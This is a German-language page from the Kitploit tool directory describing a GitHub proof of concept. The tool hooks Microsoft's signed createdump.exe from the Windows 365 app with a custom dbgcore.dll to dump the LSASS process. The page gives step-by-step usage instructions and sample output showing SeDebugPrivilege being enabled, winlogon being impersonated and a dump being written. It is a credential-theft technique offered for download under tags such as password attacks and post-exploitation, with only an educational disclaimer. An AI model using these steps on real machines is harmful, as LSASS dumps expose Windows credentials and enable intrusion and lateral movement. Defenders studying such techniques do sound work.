Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
createdump — Nutze das WindowsApp-Tool createdump, um einen lsass-Dump zu erhalten. | Kitploit
Tools/GitHubGitHub/rweijnen/createdump
PasswortangriffeImpersonations-ToolsPost-ExploitationRed Teaming
GitHubrweijnen/createdump

createdump

Nutze das WindowsApp-Tool createdump, um einen lsass-Dump zu erhalten.

Repository anzeigen
151208vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Windows App Windows App LSASS-Dump - Proof of Concept

Dieses Projekt demonstriert, wie mithilfe des Tools createdump.exe, einer von Microsoft signierten ausführbaren Datei, ein Dump des LSASS-Prozesses aus der Windows-App erstellt werden kann, wobei ein benutzerdefinierter Hook verwendet wird, um Prozesszugriff auf LSASS zu ermöglichen.

root@kitploit:~
Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')

    Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc

SignerCertificate                         Status                                       StatusMessage                               Path
-----------------                         ------                                       -------------                               ----
C2048FB509F1C37A8C3E9EC6648118458AA01780  Valid                                        Signature verified.                         createdump.exe

Verwendung

  1. Kopieren Sie createdump aus dem WindowsApp-Ordner in einen Ordner Ihrer Wahl (copy C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe .)
  2. Platzieren Sie dbgcore.dll aus diesem Repository im selben Ordner
  3. Führen Sie createdump aus (optional können Parameter angegeben werden)

Hinweis: Administratorrechte erforderlich.

Die Ausgabe sollte ungefähr so aussehen:

root@kitploit:~
c:\work\_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump

Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
  ProcessId: 35828
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
  ProcessId: 1512
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungszwecken. Der Missbrauch dieses Tools könnte Datenschutz- und Sicherheitsrichtlinien verletzen.

Tool herunterladen